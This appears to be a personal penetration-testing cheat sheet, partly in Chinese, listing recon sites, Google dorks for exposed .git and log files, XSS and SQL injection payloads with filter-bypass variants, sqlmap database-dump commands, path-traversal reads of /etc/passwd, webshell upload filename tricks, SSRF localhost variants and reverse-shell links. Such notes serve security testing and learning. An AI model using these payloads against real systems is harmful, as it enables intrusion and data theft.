- https://github.com/wiiwu959/Pentest-Record
- https://github.com/stevenyu113228/My-Security-Resources
- https://github.com/we1h0/redteam-tips
- https://github.com/Wh0ale/SRC-experience
- https://github.com/0verSp4ce/DoraBox
- https://github.com/infosecn1nja/Red-Teaming-Toolkit
- https://github.com/safe6Sec/PentestNote
- https://github.com/ghealer/TaoTie
- rustscan
wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb
sudo dpkg -i rustscan_2.0.1_amd64.deb
rustscan -a <ip>
- https://tineye.com/
- https://pimeyes.com/en
- image Forensic & steganography
- https://sitereport.netcraft.com/
- https://dnsdumpster.com/
- https://securitytrails.com/dns-trails
- https://talosintelligence.com/reputation_center/
- https://www.ipaddress.com/
- https://www.twnic.tw/whois_n.php
- https://whois.tanet.edu.tw/
- https://tools.keycdn.com/traceroute
- https://web-check.xyz/
- https://www.webhostingsecretrevealed.net/zh-TW/
- https://www.virustotal.com/gui/home/url
- https://crt.sh/
- https://builtwith.com/zh/
- https://web.archive.org/
- https://verify-email.org/
- https://mxtoolbox.com/EmailHeaders.aspx
- https://www.ipaddress.com/trace-email.html
- https://epieos.com/
- 目標資產偵察 : https://intelx.io/
- 情報蒐查 : https://phonebook.cz/
- https://www.exploit-db.com/
- https://dorksearch.com/
- https://pentest-tools.com/information-gathering/google-hacking#
- sensitive directory:
- index of:/robots.txt
- index of:/.svn
- index of:/.git
- index of:/.htaccess
- ...
- inurl:access.log
- inurl:error.log
- inurl:"admin"
- ...
- inurl:"admin.php"
- inurl:"login.aspx"
- inurl:"login.php"
- ...
- inurl:"phpMyAdmin"
- inurl:"access.log"
- ...
- 運用inurl特性靈活過濾:臺灣domain: inurl:.tw、site:.tw
- JS Leak : https://github.com/Roc-L8/JSFinderPlus
- .git
- .svn
- robots.txt
- .htaccess
- web.config
connect command:
> ftp <IP>
> telnet <IP>
> nc -C
1.找到注入點:
反射型XSS常出現在搜尋框
、url
、登入頁面
(出現在GET參數後機率高)
儲存型XSS常出現在留言板
(可以用Google Hacking搜尋intext:"留言板" AND site:xxx.xxx.xxx
、intitle:"留言板 AND site:xxx.xxx.xxx"
)
2.注入基本payload觀察回應:
我自己常用 "><script>alert(1)</script>
,常會出現以下情況:
- 直接噴alert框
- <script>被擋掉 -->
換tag bypass (<iframe>、<img>)
編碼 bypass (url encode、double url encode、html entities...)
雙tag bypass (<scr<script>ipt>alert(1)</scr</script>ipt>)
大小寫混和 bypass (<ScRiPt>alert(1)</ScRiPt>)
雙tag + 大小寫混和 bypass (<ScR<script>IpT>)
3.利用滑鼠右鍵 --> 檢查,找出漏洞可能出現的地方,通常出現在網頁上
4.繼續依照source code修改payload,一邊必須觀察可能的filter,並靈活運用bypass
Basic payload:
- "><script>alert(1)</script>
- '>alert(1)</script>
- <iframe onload="alert(1)"></iframe>
- <script>alert(1)</script>
filter bypass:
- [%27al\x65rt%27](document.domain);//
- window[‘alert’](0)
- parent[‘alert’](1)
- self[‘alert’](2)
- top[‘alert’](3)
- this[‘alert’](4)
- frames[‘alert’](5)
- content[‘alert’](6)
- constructor.constructor(“aler”+”t(3)”)();
- [].filter.constructor(‘ale’+’rt(4)’)();
- top[“al”+”ert”](5);
- top[8680439..toString(30)](7);
- top[/al/.source+/ert/.source](8);
- top[‘al\x65rt’](9);
by https://medium.com/@tobydavenn/dom-xss-on-a-gov-domain-bypassing-waf-93daec67fda9 https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309
- https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
- https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec
- https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf
- https://netsec.expert/posts/xss-in-2021/
- https://www.gushiciku.cn/pl/plU2/zh-tw
- https://xss.js.org/#/
test:
http://example.com?id=1'
http://example.com?id=' or 1=1 --
http://example.com?id=' or 1=2 --
http://example.com?id=1%27
1.找到注入點:
SQL injection常出現在搜尋框
、url
、登入頁面(有機會非法登入)
(出現在GET參數後機率高)
2.注入基本payload觀察回應:
我自己常用 ' or 1=1 -- 或 admin' or 1=1 --,常會出現以下情況:
-
直接登入
-
帳號密碼錯誤或其它錯誤
-
根本沒東西
繞過方法與xss大同小異
- 編碼 bypass
- 空白:
%20、+、
- 空白:
- 大小寫混和 bypass
- 註解 bypass(須注意不同DB使用的語法):
--
可替換為:/**/
、#
、
GET method: sqlmap -u "http://example.com?id=1"
-p
指定parameter
POST method:
sqlmap -u "http://example.com" --method POST
sqlmap -r post.txt -p <parameter>
HTTP header SQL injection: --headers
or -H
在header值的地方加上 *
add --dump
, --dbs
, --random-agent
--dump --> 拿到資料庫 --dump -D -tables --> 拿到 table name --dump -D -T
-columns --> 拿到columns name --dump -D -Tprotocal:
file://
gopher://
- ...
Path traversal:
file:../../../../../../../../{path}
(越多越好)
- bypass:
....//....//....//....//....//
../\../\../\../\../\../\
- url encode、double url encode
Basic webshell filename:
shell.php
shell.asp
bypass filename:
shell.php
shell.pHp
shell.PhP
shell.php;jpg
shell.php.jpg
<?php phpInfo();?>
http://example.com?url={payload}
http://example.com?lang={payload}
127.0.0.1
localhost
192.168.0.1
127.00000.00000.00001
127.0.1
127.1
localhost
http://example.com?url=file:///etc/passwd #for linux OS
http://example.com?url=...
- php://filter/convert.base64-encode/resource=index.php
- php://filter/convert.base64-decode/resource=index.php
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/735b0d2277b39cda75af2855362fd5e8ae50b3db/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
- Generator:https://www.revshells.com/
- https://gtfobins.github.io/#
- https://github.com/rebootuser/LinEnum
- https://github.com/mzet-/linux-exploit-suggester
- exploit : https://github.com/SecWiki/linux-kernel-exploits
- https://github.com/AlessandroZ/BeRoot/tree/master/Linux